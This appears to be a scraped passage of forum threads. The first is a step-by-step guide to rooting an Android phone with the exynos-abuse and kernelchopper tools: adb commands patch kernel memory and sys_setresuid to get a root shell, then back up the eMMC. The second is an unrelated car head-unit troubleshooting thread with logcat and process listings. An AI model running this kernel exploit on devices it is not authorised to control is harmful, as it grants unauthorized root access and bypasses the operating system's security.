adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/kernelchopper /data/.tmp
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/exynos-abuse-static /data/.tmp
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb shell
cd /data/.tmp
./grep Kernel /proc/iomem
[COLOR="RoyalBlue"]80208000[/COLOR]-80d9e39f : Kernel code
80f04000-8128184b : Kernel data
./kernelchopper d [COLOR="RoyalBlue"]80208000[/COLOR] c00000 | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 70 4b 20 25 63 20 25 73 0a 00\|: 4b 20 25 63 20 25 73 0a 00\|: 20 25 63 20 25 73 0a 00\|: 25 63 20 25 73 0a 00\|: 63 20 25 73 0a 00\|25 70 4b 20 25 63 20 25 73 0a $\|25 70 4b 20 25 63 20 25 73 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 $\|25 70 4b 20 25 63 $' | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 20 25 73 0a 00\|: 25 73 0a 00\|: 73 0a 00\|: 0a 00\|: 00\|25 70 4b 20 25 $\|25 70 4b 20 $\|25 70 4b $\|25 70 4b $\|25 70 $\|25 $'
[COLOR="Green"]80c281c[/COLOR]0: 5b 25 73 5d 0a 00 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d [COLOR="Green"]80c281c[/COLOR]0 20
80c281c0: [U]5b 25 73 5d 0a 00[/U] 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d [COLOR="Green"]80c281c[/COLOR][U]6[/U] b
[COLOR="Olive"]80c281c6[/COLOR]: [COLOR="Red"]25 70 4b 20 25 63 20 25 73 0a 00[/COLOR]
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR]
[COLOR="Red"]204b7025[/COLOR]
./grep sys_setresuid /proc/kallsyms
00000000 T sys_setresuid
00000000 T sys_setresuid16
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR] 20207025
./kernelchopper m [COLOR="Olive"]80c281c6[/COLOR]
[COLOR="Red"]20207025[/COLOR]
./grep sys_setresuid /proc/kallsyms
c[COLOR="SandyBrown"]00856f0[/COLOR] T sys_setresuid
c00b7318 T sys_setresuid16
Notice that /proc/kallsyms now gives offsets instead of 00000000.
STEP 2: patching sys_setresuid, applying manually exynos-abuse.c (found at 0x802856f0, which is 0x00856f0 plus 80208000). You should replace the underlined lone 8 by the number of bytes underlined, before the 00 00 50 e3 ...
Code:
./kernelchopper d [COLOR="YellowGreen"]802856f0[/COLOR] 80 | ./grep '00 00 50 e3\|20 00 00 ea'
[COLOR="Purple"]8028572[/COLOR]0: [U]04 72 93 e5 a7 da ff eb[/U] 00 00 50 e3 20 00 00 ea
./kernelchopper d [COLOR="Purple"]8028572[/COLOR][U]8[/U] 8
[COLOR="MediumTurquoise"]80285728[/COLOR]: [COLOR="Red"]00 00 50 e3 20 00 00 ea[/COLOR]
./kernelchopper m [COLOR="MediumTurquoise"]80285728[/COLOR]
[COLOR="Red"]e3500000[/COLOR]
./kernelchopper m [COLOR="MediumTurquoise"]80285728[/COLOR] e3500001
STEP 3: getting a root shell.
Code:
./exynos-abuse-static
[email protected]:/data/.tmp # /system/bin/id
uid=[COLOR="Red"]0[/COLOR](root) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
And you are root until end of connexion by adb. I strongly suggest to you to make the first true backup, to have a chance to restore phone to current state. With an internal microSD, you can type:
Code:
cp grep bzip2
./bzip2 -c < /dev/block/mmcblk0 > /Removable/Storage1/backup.bz2
To exploit this file, you will need kpartx.
If you have NO internal microSD, try a network drive; or if you can wait a full day (like me), you can do:
Code:
cp grep bzip2
cp grep uuencode
./bzip2 -c < /dev/block/mmcblk0 | ./uuencode -
The result will be shown on current window, so you have better hide it once it works. I had a performance of 400kb/s with hidden xterm.
You will then be able to recover its content with
Code:
LANG= grep -aA99999999 '^begin 666 -' < backup_before_installing_su_to_diskreal | uudecode -o backup.bz2
You may now install /system/xbin/su, eventually renamed to avoid exposing su to malware.
Here is my firmware (see attached pic).
Code:
Android version: 4.1.1, 3.4.0-perf-g64..., M3.13.30-A68_101034 [Jan 22 2013]
If you need help, please type up-arrow repeatedly, down-arrow repeatedly, then provide the file backup_before_installing_su_to_diskreal.
Credits to alephzain for original version of exynos-abuse.c, SW686 for kernelchopper.c, spartacusrex for Google-Play's Terminal IDE.
I now use attached shell script with . ./root_padfone.sh (notice the dot) ; please update the script if you needed to change anything in step 1, or 2.
Code:
[email protected] ~/root_padfone $ . ./root_padfone.sh
[email protected]:/data/data/com.spartacusrex.spartacuside/adb/root_padfone # exit
e3500000
[email protected] ~/root_padfone $
In the images, you see I use a ssh server to share the adb priviledges.
closed source
it seems both MotoChopper as well as framaroot are closed source rooters, so using them involves a certain risk...
mai77 said:
it seems both MotoChopper as well as framaroot are closed source rooters, so using them involves a certain risk...
Click to expand...
Click to collapse
This is why I invented the more open-source method that is displayed three posts above.
xdej said:
Just rooted my Android without unlocking !!
Click to expand...
Click to collapse
I just updated this post, any busybox you trust will work, Terminal IDE is no more needed.
I also suggested to make backups with instructions on how to make them.
Has anyone done this on a Galaxy Nexus running 4.2.2? I've spent a bunch of time searching and this seems like the only hope for rooting via an exploit on the GNex. I actually do kernel and android development but from my understanding of the posts here I need to get the address of certain kernel functions to apply this to my device. I'm running the stock build, can anyone help me with this or walk me through how to get the required information to use kernelchopper?
Thanks.
The best guide I've followed from xda this year, period.
I've rooted an a13 tablet with android 4.1.2 (it was easy as motochopper already works on it).
Tried on a 4.2.2 no-name tablet and did not manage to make it work for now, but I will try harder
Hi all,
I've purchased the above head unit (Will post specs below) and thought I'd give the 1Gb RAM unit a try, I've played about with android for a long time so already knew 1Gb was light, but I got it cheap (Always the problem!).
So I've got a Hizpo (I know that's a bundler) unit, so actual specs are:
Android 6.0.1
A-MEDIA AUTO (1024x600)
Baseband: SF3GR_M-26.3
Kernel: 3.14.0+ [email protected] #55
Build number: sofia3gr_car_64-userdebug
MCU: MTCD_XRC_V2.58_1
Memory: 918MB
Now this seems to be quite up to date, new Android, new MCU version and kernel. It boots pretty quickly and also apps do load quite quickly too, even google maps.
The problem I have is that apps suddenly close without warning and without error. So for example I open google maps, choose directions, and go to start navigation and suddenly it closes. No normal app has crashed message or anything like that.
So my suspicion is this is some kind of task killer running, killing apps that are trying to consume too much memory or CPU. I know the stock rom has something like this as I have a 'rocket' icon I can click and it shows how much ram it has managed to free up. I'm suspecting there is a background service doing this periodically and killing things, but being a bit over-ambitious! So far I'm not consuming anywhere near the full RAM, whenever I've checked I've had around 600MB free at any one time and the unit isn't going really laggy or anything I'd expect, so I think it's just the task killer getting in the way.
Does anyone have anything similar, or have found what is killing tasks off like this?
I'm trying to get adb over wireless working, initially this hasn't worked but I've got another couple of ways to try first to get adb debugging.
Any suggestions please?
(And yes I know, moving to a 2Gb board would be simplest option, but cost is an issue!)
Hi Andy,
I recently bought exactly the same unit off an eBay seller 'stereo_eu'.
My unit behaves exactly the same a yours - BADLY!
First problem occured when the apparent UK stock unit took 3 weeks to arrive from China, and eBay removed the sellers items for an unspecified infringement.
After fitting, it does exactly as you described, and other nonsense.
I found a MCU version V2.60 which installed correctly but made no difference.
I then contacted the seller who sent me a link to an update.zip package, which turned out to be a
corrupt .zip file, (new4_sofia_6.0_wifi(20170915).zip) and put my unit into a V6.1.2 recovery mode loop.
I managed to recover it with a V5.1.1 Lolipop version found on here, and it's better than the stock 6.0.1
software, but still has it's problems.
They seem totally unwilling to link to a 'non corrupt' update file, and have asked me to send the unit back (to China) for replacement, which I have declined, and requested a return to their UK address, and a refund.
Not impressed at all so far . . . . . . . .
Well, I'm not saying the units are junk, I'm relatively happy as I can still use my phone for navigation, so not a total loss, but I like tinkering with android (I'm a former android dev) so figuring out what's going on is what I'm aiming to do.
I've now installed root (SuperSu) and doing adb shell I can gain root and get through the filesystem to see what's going on. adb logcat didn't show anything interesting as I thought it might, I've also confirmed that "Sofia-1-C9-Server-V1.0.apk" does not exist on this head unit, however when you turn the ignition off it shows "Shutting Down" and goes into a sleep mode which does a similar thing and kills all background services, etc which again don't get restarted after powering back on.
I've got a bit of logcat output when I launched maps, and in the process of launching maps the music playing in the background stopped, but noting in the log seems to indicate why:
11-23 19:27:37.209 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.217 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.227 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.231 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.239 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.243 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.244 1417 4469 I GCoreUlr: Successfully inserted 1 locations
11-23 19:27:37.254 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:37.257 1417 4469 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:38.190 1417 1417 I GeofencerStateMachine: sendTransitions: location=Location[fused 0.0,-1.1 acc=6 et=+20m47s600ms alt=82.6459732055664 vel=0.0 bear=171.0 {Bundle[mParcelledData.dataSize=356]}]
11-23 19:27:39.284 575 731 I ActivityManager: START u0 {act=android.intent.action.MAIN cat=[android.intent.category.HOME] flg=0x10200000 cmp=com.android.launcher/com.android.launcher2.Launcher (has extras)} from uid 1000 on display 0
11-23 19:27:39.484 575 743 E WifiConfigStore: makeChannelList age=3600000 for "MYWIFIHERE"WPA_PSK max=6 bssids=1
11-23 19:27:39.485 575 743 E WifiConfigStore: has my:mac:adress:here freq=2412 age=2902 ?=true
11-23 19:27:39.487 575 743 D WifiStateMachine: starting scan for "MYWIFIHERE"WPA_PSK with 2412
11-23 19:27:39.534 831 1054 I OpenGLRenderer: Initialized EGL, version 1.4
11-23 19:27:39.588 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-73 "MYWIFIHERE"WPA_PSK
11-23 19:27:39.663 831 1054 V RenderScript: 0xde54d000 Launching thread(s), CPUs 4
11-23 19:27:39.701 575 743 E WifiConfigStore: updateSavedNetworkHistory(): try "MYWIFIHERE"WPA_PSK SSID="MYWIFIHERE" MYWIFIHERE [WPA2-PSK-CCMP][ESS] ajst=0
11-23 19:27:39.702 575 743 E WifiConfigStore: got known scan result my:mac:adress:here key : "MYWIFIHERE"WPA_PSK num: 1 rssi=-72 freq=2412
11-23 19:27:39.706 575 743 E WifiConfigStore: writeKnownNetworkHistory() num networks:3 needWrite=false
11-23 19:27:40.140 831 1054 W OpenGLRenderer: Incorrectly called buildLayer on View: ShortcutAndWidgetContainer, destroying layer...
11-23 19:27:40.140 831 1054 W OpenGLRenderer: Incorrectly called buildLayer on View: ShortcutAndWidgetContainer, destroying layer...
11-23 19:27:42.594 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-72 "MYWIFIHERE"WPA_PSK
11-23 19:27:43.938 1417 1417 I GeofencerStateMachine: sendTransitions: location=Location[fused 0.0,-1.1 acc=6 et=+20m52s603ms alt=82.55806732177734 vel=0.0 bear=171.0 {Bundle[mParcelledData.dataSize=356]}]
11-23 19:27:44.607 4505 4514 W CursorWrapperInner: Cursor finalized without prior close()
11-23 19:27:45.602 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-73 "MYWIFIHERE"WPA_PSK
11-23 19:27:48.240 1417 1417 I GeofencerStateMachine: sendTransitions: location=Location[fused acc=6 et=+20m57s609ms alt=82.54087829589844 vel=0.0 bear=171.0 {Bundle[mParcelledData.dataSize=356]}]
11-23 19:27:48.609 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-73 "MYWIFIHERE"WPA_PSK
11-23 19:27:51.616 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-73 "MYWIFIHERE"WPA_PSK
11-23 19:27:52.231 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.234 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.242 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.246 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.251 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.257 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.258 1417 4564 I GCoreUlr: Successfully inserted 1 locations
11-23 19:27:52.266 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:52.268 1417 4564 E Settings: getIntForUser name:location_mode value:3
11-23 19:27:53.206 1417 1417 I GeofencerStateMachine: sendTransitions: location=Location[fused acc=6 et=+21m2s613ms alt=82.54087829589844 vel=0.0 bear=171.0 {Bundle[mParcelledData.dataSize=356]}]
11-23 19:27:53.506 575 840 I ActivityManager: START u0 {act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x10200000 cmp=com.microntek.navisettings/.MainActivity bnds=[315,104][450,277] (has extras)} from uid 10013 on display 0
11-23 19:27:53.586 4576 4576 E art : setrlimit(RLIMIT_CORE) failed for pid 4576: Operation not permitted
11-23 19:27:53.596 575 2496 I ActivityManager: Start proc 4576:com.microntek.navisettings/u0a59 for activity com.microntek.navisettings/.MainActivity
11-23 19:27:53.764 4576 4576 W System : ClassLoader referenced unknown path: /system/app/MTCNaviSettings/lib/x86
11-23 19:27:53.883 575 2263 I ActivityManager: START u0 {act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x30220000 pkg=com.google.android.apps.maps cmp=com.google.android.apps.maps/com.google.android.maps.MapsActivity} from uid 10059 on display 0
11-23 19:27:54.050 575 587 I art : Background partial concurrent mark sweep GC freed 13790(926KB) AllocSpace objects, 2(40KB) LOS objects, 27% free, 10MB/14MB, paused 3.709ms total 112.505ms
11-23 19:27:54.071 185 185 W hwcomposer: zone is small ,LCDC can not support
11-23 19:27:54.159 4214 4225 I art : Background sticky concurrent mark sweep GC freed 5640(458KB) AllocSpace objects, 9(744KB) LOS objects, 4% free, 38MB/40MB, paused 6.416ms total 63.265ms
11-23 19:27:54.309 4214 4214 I System.out: DEBUG getting preferred mode DRIVE
11-23 19:27:54.338 4590 4590 E art : setrlimit(RLIMIT_CORE) failed for pid 4590: Operation not permitted
11-23 19:27:54.345 575 813 I ActivityManager: Start proc 4590:com.google.process.gapps/u0a10 for content provider com.google.android.gsf/.settings.GoogleSettingsProvider
11-23 19:27:54.348 4214 4214 I System.out: DEBUG getting preferred mode DRIVE
11-23 19:27:54.432 575 2495 D Sensors : activate handle=5,enabled=1
11-23 19:27:54.432 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.432 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.433 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.447 575 853 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.447 575 853 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.447 575 853 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.468 575 2453 D Sensors : activate handle=3,enabled=1
11-23 19:27:54.468 575 2453 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.468 575 2453 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.468 575 2453 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.554 4590 4590 W System : ClassLoader referenced unknown path: /system/priv-app/GoogleServicesFramework/lib/x86
11-23 19:27:54.582 4214 4232 I System.out: DEBUG getting preferred mode DRIVE
11-23 19:27:54.590 4590 4590 I GservicesProvider: Gservices pushing to system: true; secure/global: true
11-23 19:27:54.609 4214 4214 I Choreographer: Skipped 36 frames! The application may be doing too much work on its main thread.
11-23 19:27:54.626 575 743 E WifiConfigStore: updateConfiguration freq=2412 BSSID=my:mac:adress:here RSSI=-74 "MYWIFIHERE"WPA_PSK
11-23 19:27:54.872 4590 4590 I GoogleHttpClient: GMS http client unavailable, use old client
11-23 19:27:54.933 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.933 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.933 575 2495 E Sensors : HALpen of failed with 'No such file or directory' (2)
11-23 19:27:54.977 1417 1417 I GeofencerStateMachine: sendNewLocationAvailability: availability=LocationAvailability[isLocationAvailable: true]
11-23 19:27:54.994 1417 1417 I GeofencerStateMachine: sendNewLocationAvailability: availability=LocationAvailability[isLocationAvailable: true]
Click to expand...
Click to collapse
List of apps in /system/app
[email protected]_car:/system/app # ls
Bluetooth
BluetoothMidiService
Browser
Calendar
CaptivePortalLogin
CertInstaller
DeskClock
DocumentsUI
ExactCalculator
Galaxy4
Gallery2
Gmail2
GooglePinyinIME
HCTBlueTooth4
HCTBtMusic4
HCTCarTouch
HCTUpdateService
HTMLViewer
HoloSpiralWallpaper
KeyChain
LatinIME
LiveWallpapers
LiveWallpapersPicker
MTCAPKInstall
MTCAVIN
MTCAmpSetup
MTCBackView
MTCCarCD
MTCCivicUSBIPOD
MTCControlInfo
MTCControlSettings
MTCDVD4
MTCFactorySettings
MTCFileBrowser4
MTCIpod4
MTCMovie4
MTCMusic4
MTCNaviSettings
MTCRadio4HCT
MTCSYNC
MTCScreenClock
MTCTV
MTCTpms
MTCTravel4
MTCWheelStudy
Maps
Music
NoiseField
OpenWnn
PacProcessor
PhaseBeam
PicoTts
PrintSpooler
Provision
RFTest
Stk
SuperSU
UserDictionaryProvider
WAPPushManager
webview
Click to expand...
Click to collapse
So I'm now onto debugging a bit closer, any extra info anyone can provide would be welcome!
Oh and process listing
[email protected]_car:/system/app # ps
USER PID PPID VSIZE RSS WCHAN PC NAME
root 1 0 3060 528 SyS_epoll_ f7795b80 S /init
root 2 0 0 0 kthreadd 00000000 S kthreadd
root 3 2 0 0 smpboot_th 00000000 S ksoftirqd/0
root 5 2 0 0 worker_thr 00000000 S kworker/0:0H
root 6 2 0 0 worker_thr 00000000 S kworker/u8:0
root 7 2 0 0 rcu_gp_kth 00000000 S rcu_preempt
root 8 2 0 0 rcu_gp_kth 00000000 S rcu_sched
root 9 2 0 0 rcu_gp_kth 00000000 S rcu_bh
root 10 2 0 0 smpboot_th 00000000 S migration/0
root 11 2 0 0 worker_thr 00000000 S kworker/0:1
root 12 2 0 0 smpboot_th 00000000 S watchdog/0
root 13 2 0 0 smpboot_th 00000000 S watchdog/1
root 14 2 0 0 smpboot_th 00000000 S migration/1
root 15 2 0 0 smpboot_th 00000000 S ksoftirqd/1
root 17 2 0 0 worker_thr 00000000 S kworker/1:0H
root 18 2 0 0 worker_thr 00000000 S kworker/1:1
root 19 2 0 0 smpboot_th 00000000 S watchdog/2
root 20 2 0 0 smpboot_th 00000000 S migration/2
root 21 2 0 0 smpboot_th 00000000 S ksoftirqd/2
root 23 2 0 0 worker_thr 00000000 S kworker/2:0H
root 24 2 0 0 worker_thr 00000000 S kworker/2:1
root 25 2 0 0 smpboot_th 00000000 S watchdog/3
root 26 2 0 0 smpboot_th 00000000 S migration/3
root 27 2 0 0 smpboot_th 00000000 S ksoftirqd/3
root 28 2 0 0 worker_thr 00000000 S kworker/3:0
root 29 2 0 0 worker_thr 00000000 S kworker/3:0H
root 31 2 0 0 rescuer_th 00000000 S khelper
root 32 2 0 0 vdump_thre 00000000 S vdump Thread
root 33 2 0 0 console_th 00000000 S kconsole
root 34 2 0 0 rescuer_th 00000000 S writeback
root 35 2 0 0 ksm_scan_t 00000000 S ksmd
root 36 2 0 0 rescuer_th 00000000 S bioset
root 37 2 0 0 rescuer_th 00000000 S kblockd
root 38 2 0 0 hub_thread 00000000 S khubd
root 54 2 0 0 fmdev_fifo 00000000 S iui_fm
root 55 2 0 0 ion_heap_d 00000000 S system-heap
root 56 2 0 0 mvpipe_dev 00000000 S ion_secvm_handl
root 57 2 0 0 irq_thread 00000000 S irq/303-rk818
root 58 2 0 0 rescuer_th 00000000 S rk81x_otg_work
root 59 2 0 0 rev_thread 00000000 D rev_thread
root 60 2 0 0 rockchip_f 00000000 S fb-vsync
root 61 2 0 0 kthread_wo 00000000 S rockchip-fb
root 62 2 0 0 cpufreq_in 00000000 S cfinteractive
root 63 2 0 0 irq_thread 00000000 S irq/320-car-rev
root 64 2 0 0 irq_thread 00000000 S irq/321-car-acc
root 65 2 0 0 rescuer_th 00000000 S rk81x-battery-w
root 66 2 0 0 rescuer_th 00000000 S car_wq
root 67 2 0 0 rescuer_th 00000000 S goodix_wq
root 89 2 0 0 kswapd 00000000 S kswapd0
root 90 2 0 0 fsnotify_m 00000000 S fsnotify_mark
root 91 2 0 0 rescuer_th 00000000 S crypto
root 105 2 0 0 rescuer_th 00000000 S bl_wq
root 106 2 0 0 irq_thread 00000000 S irq/40-rga
root 107 2 0 0 vnvm_serve 00000000 S vnvm
root 108 2 0 0 mvpipe_dev 00000000 S VUSB_SE_FE_MEX_
root 109 2 0 0 worker_thr 00000000 S kworker/u9:0
root 110 2 0 0 down_inter 00000000 S vsec
root 111 2 0 0 rescuer_th 00000000 S idi_error_work_
root 112 2 0 0 irq_thread 00000000 S irq/110-vpu.177
root 113 2 0 0 irq_thread 00000000 S irq/111-vpu.177
root 114 2 0 0 irq_thread 00000000 S irq/38-hevc.178
root 115 2 0 0 rescuer_th 00000000 S dwc2
root 116 2 0 0 rescuer_th 00000000 S uether
root 117 2 0 0 rescuer_th 00000000 S adv_wq
root 118 2 0 0 rescuer_th 00000000 S dm_bufio_cache
root 120 2 0 0 mmc_queue_ 00000000 S mmcqd/0
root 121 2 0 0 mmc_queue_ 00000000 S mmcqd/0boot0
root 122 2 0 0 mmc_queue_ 00000000 S mmcqd/0boot1
root 123 2 0 0 mmc_queue_ 00000000 S mmcqd/0rpmb
root 124 2 0 0 worker_thr 00000000 S kworker/2:2
root 125 2 0 0 rescuer_th 00000000 S binder
root 126 2 0 0 intel_adc_ 00000000 S adc-thread
root 127 2 0 0 oct_thread 00000000 S OCT Thread
root 128 2 0 0 rescuer_th 00000000 S dvd_wq
root 129 2 0 0 irq_thread 00000000 S irq/108-dsp_int
root 130 2 0 0 irq_thread 00000000 S irq/107-dsp_int
root 131 2 0 0 irq_thread 00000000 S irq/99-dsp_int3
root 132 2 0 0 rescuer_th 00000000 S ipv6_addrconf
root 133 2 0 0 rescuer_th 00000000 S fuel_gauge.187
root 134 2 0 0 mmc_queue_ 00000000 S mmcqd/1
root 136 2 0 0 rescuer_th 00000000 S deferwq
root 139 2 0 0 worker_thr 00000000 S kworker/u8:4
root 140 2 0 0 irq_thread 00000000 S irq/283-jack_ir
root 141 2 0 0 irq_thread 00000000 S irq/284-button_
root 142 2 0 0 rescuer_th 00000000 S f_mtp
root 143 2 0 0 rescuer_th 00000000 S setExposure_que
root 144 2 0 0 rescuer_th 00000000 S measurement_que
root 145 2 0 0 rescuer_th 00000000 S bat_hal-0
root 148 1 2540 124 poll_sched f7712b80 S /sbin/ueventd
root 151 2 0 0 worker_thr 00000000 S kworker/0:1H
root 152 2 0 0 worker_thr 00000000 S kworker/1:1H
root 153 2 0 0 kjournald2 00000000 S jbd2/mmcblk0p14
root 154 2 0 0 rescuer_th 00000000 S ext4-rsv-conver
root 157 2 0 0 worker_thr 00000000 S kworker/2:1H
root 159 2 0 0 kjournald2 00000000 S jbd2/mmcblk0p15
root 160 2 0 0 rescuer_th 00000000 S ext4-rsv-conver
root 164 2 0 0 kjournald2 00000000 S jbd2/mmcblk0p13
root 165 2 0 0 rescuer_th 00000000 S ext4-rsv-conver
logd 166 1 14856 2436 sigsuspend f76e3b80 S /system/bin/logd
root 167 1 11644 912 hrtimer_na f7675b80 S /system/bin/vold
root 172 2 0 0 kauditd_th 00000000 S kauditd
root 182 1 2932 304 SyS_epoll_ f7758b80 S /sbin/healthd
root 183 1 4308 708 SyS_epoll_ f772ab80 S /system/bin/lmkd
system 184 1 4116 660 binder_thr f7744b80 S /system/bin/servicemanager
system 185 1 61108 3840 SyS_epoll_ f770fb80 S /system/bin/surfaceflinger
root 186 1 2284 0 hrtimer_na f77dfb80 S /sbin/watchdogd
radio 187 1 5648 660 SyS_epoll_ f779cb80 S /system/bin/rpcServer
shell 193 1 4328 672 n_tty_read f7731b80 S /system/bin/sh
radio 194 1 16412 940 hrtimer_na f775bb80 S /system/bin/rild
radio 195 1 16156 800 hrtimer_na f76cbb80 S /system/bin/rild
root 196 1 17884 1468 hrtimer_na f773fb80 S /system/bin/netd
root 198 1 4936 968 __skb_recv f773bb80 S /system/bin/debuggerd
drm 199 1 25160 1428 binder_thr f773bb80 S /system/bin/drmserver
media 200 1 139544 3632 binder_thr f7705b80 S /system/bin/mediaserver
root 201 1 4216 1028 unix_strea f76afb80 S /system/bin/installd
keystore 204 1 7692 1144 binder_thr f7766b80 S /system/bin/keystore
system 205 1 7960 780 binder_thr f76fbb80 S /system/bin/pluginservice
system 206 1 4276 684 atdev_ioct f7768b80 S /system/bin/startIpcsd
radio 207 1 6536 632 fmdev_fifo f76ecb80 S /system/bin/fmd
gps 208 1 4328 724 sigsuspend f7678b80 S /system/bin/sh
root 209 1 827376 32696 poll_sched f772eb80 S zygote
system 210 1 7364 1056 binder_thr f775cb80 S /system/bin/gatekeeperd
root 211 1 4240 616 hrtimer_na f7738b80 S /system/xbin/perfprofd
root 214 1 8100 1076 poll_sched f76fdb80 S /system/vendor/bin/crashlogd
root 215 1 6560 944 devkmsg_re f773bb80 S /vendor/bin/log-watch
root 218 2 0 0 worker_thr 00000000 S kworker/3:1H
root 221 1 3876 212 __skb_recv f76dab80 S daemonsu:mount:master
root 229 2 0 0 kjournald2 00000000 S jbd2/mmcblk0p5-
root 230 2 0 0 rescuer_th 00000000 S ext4-rsv-conver
root 247 1 7228 416 __skb_recv f76dab80 S daemonsu:master
root 252 2 0 0 rescuer_th 00000000 S cfg80211
gps 256 208 21528 2016 futex_wait f731fb80 S /system/bin/lbsd
radio 259 1 8300 732 nvmdev_ioc f76e9b80 S /system/bin/nvm_useragent
radio 262 1 15060 628 hrtimer_na f7783b80 S /system/bin/rpc-daemon
shell 263 1 10392 352 poll_sched f7761b80 S /sbin/adbd
root 327 2 0 0 irq_thread 00000000 S irq/289-gnss_wa
root 329 2 0 0 irq_thread 00000000 S irq/291-gnss_er
root 395 2 0 0 irq_thread 00000000 S irq/293-wlan_ir
root 532 1 4328 716 sigsuspend f7675b80 S /system/bin/sh
root 541 532 5316 860 __skb_recv f76dab80 S /system/vendor/bin/logcatext
system 575 209 898040 83068 SyS_epoll_ f772eb80 S system_server
root 701 2 0 0 mvpipe_dev 00000000 S VUSB_SE_FE_LINK
root 702 2 0 0 n_tty_read 00000000 S VUSB_SE_FE_LINK
root 703 2 0 0 msleep 00000000 D VUSB_SE_FE_MODE
root 736 2 0 0 rescuer_th 00000000 S vs-2
wifi 765 1 8788 2172 poll_sched f7509b80 S /system/bin/wpa_supplicant
media_rw 787 167 7896 912 inotify_re f7747b80 S /system/bin/sdcard
radio 800 209 696084 36216 SyS_epoll_ f772eb80 S com.android.phone
u0_a21 817 209 733912 46884 SyS_epoll_ f772eb80 S com.android.systemui
u0_a13 831 209 706448 53000 SyS_epoll_ f772eb80 S com.android.launcher
root 851 2 0 0 worker_thr 00000000 S kworker/3:2
media_rw 987 167 8156 716 inotify_re f778db80 S /system/bin/sdcard
u0_a76 1081 209 668624 25904 SyS_epoll_ f772eb80 S com.android.smspush
root 1123 2 0 0 worker_thr 00000000 S kworker/u9:2
u0_a9 1190 209 668636 26560 SyS_epoll_ f772eb80 S com.android.externalstorage
u0_a22 1336 209 953040 30864 SyS_epoll_ f772eb80 S com.google.android.googlequicksearchbox:interactor
u0_a43 1350 209 703316 48884 SyS_epoll_ f772eb80 S com.android.inputmethod.latin
system 1385 209 672148 28020 SyS_epoll_ f772eb80 S android.microntek.canbus
u0_a10 1417 209 845516 74952 SyS_epoll_ f772eb80 S com.google.android.gms.persistent
root 1431 1 4328 560 sigsuspend f772eb80 S /system/bin/sh
u0_a8 1438 209 681944 38376 SyS_epoll_ f772eb80 S android.process.media
u0_a10 1492 209 685848 32932 SyS_epoll_ f772eb80 S com.google.process.gapps
root 1497 1431 85112 360 poll_sched 40190422 S /system/bin/adb-ec
root 1503 2 0 0 rescuer_th 00000000 S vs-0
root 1530 1 4328 712 poll_sched f76adb80 S /system/bin/sh
u0_a10 1619 209 1046992 102860 SyS_epoll_ f772eb80 S com.google.android.gms
